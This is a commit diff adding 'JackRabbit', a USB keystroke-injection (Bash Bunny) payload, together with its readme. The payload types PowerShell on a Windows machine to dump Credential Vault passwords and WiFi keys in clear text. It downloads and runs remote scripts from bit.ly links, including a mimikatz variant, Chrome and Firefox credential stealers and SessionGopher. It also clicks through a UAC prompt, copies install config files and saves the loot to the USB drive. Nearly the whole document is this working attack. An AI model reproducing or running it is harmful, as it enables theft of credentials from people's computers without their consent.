Added browsercreds, wificreds, and mrrobot payloads (#114)

* Initial commit

HID Powershell attack to dump WiFiCreds

* Update readme.md

* changed initial LED blink color to white

* Changed initial LED color to white

* Changed initial LED Color to white

* swapped sync before LED

* switched from powershell to batch

* Update payload.txt

* using powershell again , updated version and LEDs

* using powershell, added usb eject,  Win 7,8,10

* added window resizing to hide payload typing

* Update payload.txt

* pull request

* BrowserCreds Pull

* separate powershell script called from payload

also added result detection

* update LEDs

* Update payload.txt

* initial commit

* Update payload.txt

* initial pull

* initial commit

payloads/library/JackRabbit/payload.txt

@@ -0,0 +1,162 @@
+#!/bin/bash
+#
+# Title:         JackRabbit
+# Author:        illwill
+# Version:       0.1
+#
+# Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a 
+# Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
+#
+# Credits to these guys for their powershell scripts:
+# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
+# https://github.com/EmpireProject/Empire    Get-FoxDump.ps1
+# https://github.com/fireeye/SessionGopher   SessionGopher .ps1
+# https://github.com/gentilkiwi/mimikatz     md.ps1 from gentilkiwi/clymb3r/mattifestation obfuscated to mimidogz
+
+#script 
+# Purple...............Jackin dat loot
+# Green................Jacked dat loot
+# Red Blue.............PoPo caught yo ass
+
+
+LED R B 200
+LOOTDIR=/root/udisk/loot/JackRabbit
+mkdir -p $LOOTDIR
+
+ATTACKMODE HID STORAGE
+LED B 200
+
+# wait 6 seconds for the storage to popup
+Q DELAY 6000
+Q GUI r
+Q DELAY 100
+Q STRING POWERSHELL
+Q ENTER
+Q DELAY 500
+Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
+Q ENTER
+Q DELAY 100
+
+# Make the loot folder of the computername
+Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
+Q ENTER
+Q DELAY 100
+Q STRING md \$LOOTDIR2
+Q ENTER
+Q DELAY 100
+
+# Jackin' Credential Vault (I.E./Edge)
+Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
+Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \| 
+Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
+Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$LOOTDIR2\\IE-Edge.txt
+Q ENTER
+Q DELAY 100
+
+# Jackin' Chrome Creds
+Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt
+Q ENTER
+Q DELAY 100
+
+Q STRING exit
+Q ENTER
+
+# Open 32bit powershell and Jackin' Firefox Creds
+Q GUI r
+Q DELAY 100
+Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
+Q ENTER
+Q DELAY 2000
+Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
+Q ENTER
+Q DELAY 100
+Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
+Q ENTER
+Q DELAY 100
+Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File \$LOOTDIR2\\FireFox.txt
+Q ENTER
+Q DELAY 100
+Q STRING exit
+Q ENTER
+
+# UAC Bypass
+Q GUI r
+Q STRING powershell -c "Start-Process powershell -verb runas"
+Q ENTER
+Q DELAY 1500
+Q LEFTARROW
+Q DELAY 500
+Q ENTER
+Q DELAY 1000
+Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
+Q ENTER
+Q DELAY 100
+Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
+Q ENTER
+Q DELAY 100
+
+# Jackin' Windows creds
+Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nP5aQv\'\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt
+Q DELAY 300
+Q ENTER
+
+# Jackin' Wifi creds
+Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| 
+Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\}  \| Select-String \""Key Content\\W+\\:(.+)\$\"" \|
+Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \|
+Q STRING Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt
+Q ENTER
+Q DELAY 100
+
+# Jackin' SSH Creds
+# change to "Invoke-SessionGopher -Thorough" if you want to search for PuTTY private key (.ppk), Remote Desktop (.rdp), and RSA token (.sdtid) files, to extract private key and session information.
+Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nrfTPI\'\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt
+Q ENTER
+Q DELAY 100
+
+# Jackin' dem install configs
+Q STRING \$F \= @\(\)\;\$F \+\= \"C:\\sysprep.inf\"\;\$F \+\= \"C:\\sysprep\\sysprep.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattend\\Unattended.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattended.xml\"\;
+Q STRING \$i \= 0\; foreach\(\$file in \$F\) \{if \(Test-Path \$file\)\{cp \$file \$LOOTDIR2\;\$i\+\+\}\}
+Q ENTER
+Q DELAY 100
+
+# Output DONE to root of USB file to let bashbunny we're all good in the hood
+Q DELAY 100
+Q STRING Out-File -FilePath \$BUNNY\\loot\\DONE
+Q ENTER
+Q DELAY 100
+
+# Eject the USB Safely 
+Q STRING \$Eject \=  New-Object -comObject Shell.Application
+Q ENTER
+Q DELAY 100
+Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
+Q ENTER
+Q DELAY 1000
+
+# GTFO
+Q STRING EXIT
+Q ENTER
+
+#Sync Drive
+sync
+
+
+FILE="/root/udisk/loot/DONE"
+while [ ! -e $FILE ]; do sleep 1; done;
+sleep 1;
+if [ -e $FILE ]; then rm -f $FILE; LED G 200
+else LED R; 
+  for (( ; ; ))
+  do
+    LED R; 
+    sleep 1;
+    LED B;
+    sleep 1;
+  done
+fi
+
+
+
+
+

payloads/library/JackRabbit/readme.md

@@ -0,0 +1,25 @@
+# JackRabbit
+
+* Author: illwill
+* Version: Version 0.1
+* Target: Windows
+
+## Description
+
+Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a 
+Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
+
+## Configuration
+
+None needed. 
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Purple (blinking)  | Jackin dat loot                              |
+| Green  (blinking)  | Jacked dat loot                              |
+| RED BLUE(blinking) | PoPo caught yo ass                           |
+
+## Discussion
+